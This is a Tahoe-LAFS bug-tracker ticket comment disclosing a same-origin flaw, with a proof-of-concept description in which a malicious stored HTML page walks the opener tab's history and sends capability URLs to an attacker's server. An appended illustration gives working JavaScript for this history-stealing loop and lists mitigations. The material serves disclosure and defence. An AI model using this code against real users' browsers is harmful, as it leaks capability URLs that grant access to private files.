[tahoe-lafs-trac-stream] [Tahoe-LAFS] #615: Can JavaScript loaded from Tahoe access all your content which is loaded from Tahoe?

Tahoe-LAFS trac at tahoe-lafs.org
Sun Apr 26 23:52:37 UTC 2015


#615: Can JavaScript loaded from Tahoe access all your content which is loaded
from Tahoe?
-------------------------------------------------------------------------
     Reporter:  zooko
        Owner:  davidsarah
         Type:  defect
       Status:  assigned
     Priority:  critical
    Milestone:  soon
    Component:  code-frontend-web
      Version:  1.3.0
     Keywords:  newcaps confidentiality integrity preservation capleak gsoc websec
   Resolution:
Launchpad Bug:
-------------------------------------------------------------------------

Comment (by TheJH):

 I made a PoC that shows one possible way to exploit this. Use a Tahoe-LAFS
 instance that is connected to the testnet, browse to different URLs in the
 testnet, then navigate the same tab to this URL:

 http://localhost:3456/file/URI%3ACHK%3A6hxsjrbtiyjohpj7i7bn6dqixi%3Ail3humxxej53gg6bpr3l5ecxrqdg6wnd5ceuq33vqtrivvrhlfeq%3A1%3A6%3A1262/@@named=/historysteal.html

 Click anywhere on the page. The following attack will happen:

 -------------------------
 The evil HTML file opens itself in a second tab using
 "window.open(location.toString(), 'foo')" (requires a click to bypass
 popup blockers). Then the evil HTML file in the second tab can
 access the first tab using "window.opener". The evil second tab does this
 again and again:

  - run window.parent.history.go(-1) to let the first tab go one step back
 in the browsing history
  - grab the current URL of the first tab using
 window.parent.location.toString()
  - send the URL out to the attacker's server

 This will work until a page with a different origin is reached.
 -------------------------

 After the attack has run, you'll see the URLs that you have visited in the
 same tab before.

 This is a copy of the HTML file:
 https://var.thejh.net/lafs_historysteal.html.bin

--
Ticket URL: <https://tahoe-lafs.org/trac/tahoe-lafs/ticket/615#comment:29>
Tahoe-LAFS <https://Tahoe-LAFS.org>
secure decentralized storage
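Added illustration (not part of TheJH's comment and not his PoC file): the loop his comment describes, written against the properties a popup really gets from its opener (window.opener, history.go(), location.href), plus a constructed stand-in for the victim tab so the walk can run outside a browser. The stand-in tab (makeFakeTab), the sample history, the ATTACKER_ORIGIN constant and the exfiltrate callback are assumptions of this example, not anything from the ticket.

```javascript
// Same-origin history walk from a popup. While the tab that called
// window.open() and the popup share an origin, the popup can drive that tab's
// session history through window.opener and read each URL it lands on. The
// moment the opener lands on another origin the browser throws a
// SecurityError on `history` and on `location.href`, which ends the walk.
//
// ASSUMPTIONS of this example: `opener` is window.opener (or the stand-in
// below); `exfiltrate` is a callback that stands in for a request to the
// attacker's server (e.g. setting an Image src); ATTACKER_ORIGIN is where the
// evil page is served from, here the Tahoe web gateway port from the ticket.
// In a real browser history.go(-1) completes asynchronously, so a live page
// must wait (setTimeout/setInterval) between the step and the read; the
// stand-in tab applies the navigation synchronously so the loop is direct.

const ATTACKER_ORIGIN = 'http://localhost:3456';

function stealHistory(opener, exfiltrate, maxSteps = 50) {
  const stolen = [];
  let current;
  try {
    current = opener.location.href; // the evil page itself, if same-origin
  } catch (e) {
    return stolen; // opener is already cross-origin: nothing is readable
  }
  for (let i = 0; i < maxSteps; i++) {
    let url;
    try {
      opener.history.go(-1);      // throws SecurityError once cross-origin
      url = opener.location.href; // throws SecurityError once cross-origin
    } catch (e) {
      if (e.name === 'SecurityError') break; // crossed an origin boundary
      throw e;
    }
    if (url === current) break; // start of the tab's history reached
    current = url;
    stolen.push(url);
    exfiltrate(url);
  }
  return stolen;
}

// Constructed stand-in for the victim tab (assumption: not a real Window).
// `entries` is the tab's session history, oldest first; the tab starts on the
// last entry. Cross-origin access is modelled the way browsers enforce it:
// the `history` property and `location.href` throw a SecurityError.
function makeFakeTab(entries, observerOrigin) {
  let idx = entries.length - 1;
  const sameOrigin = () => new URL(entries[idx]).origin === observerOrigin;
  const securityError = () => {
    const e = new Error(
      `Blocked a frame with origin "${observerOrigin}" from accessing a cross-origin frame.`);
    e.name = 'SecurityError';
    return e;
  };
  return {
    get location() {
      return {
        get href() {
          if (!sameOrigin()) throw securityError();
          return entries[idx];
        },
      };
    },
    get history() {
      if (!sameOrigin()) throw securityError();
      return {
        go(delta) {
          idx = Math.min(entries.length - 1, Math.max(0, idx + delta));
        },
      };
    },
  };
}

// Constructed browsing history for the demo; the capability strings are
// placeholders, not real Tahoe caps. The tab is currently showing the last
// entry, i.e. the evil page, as in the comment above.
const SAMPLE_HISTORY = [
  'https://example.com/',                                         // earlier, other origin
  'http://localhost:3456/uri/URI%3ADIR2%3ASAMPLE-A/',             // Tahoe directory page
  'http://localhost:3456/uri/URI%3ACHK%3ASAMPLE-B/@@named=/notes.txt',
  'http://localhost:3456/file/URI%3ACHK%3ASAMPLE-C/@@named=/evil.html',
];

function demo() {
  const victimTab = makeFakeTab(SAMPLE_HISTORY, ATTACKER_ORIGIN);
  const sent = [];
  stealHistory(victimTab, (u) => sent.push(u));
  return sent; // the two Tahoe URLs; the walk stops before example.com
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(demo());
}
```

The only thing that stops the walk is the same-origin policy, which is why the ticket is about origins rather than about this one page: if every stored file is served from its own origin, or served with a Content-Security-Policy "sandbox" directive (opaque origin) or as Content-Disposition: attachment, the opener is cross-origin from the first read and stealHistory returns an empty list.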

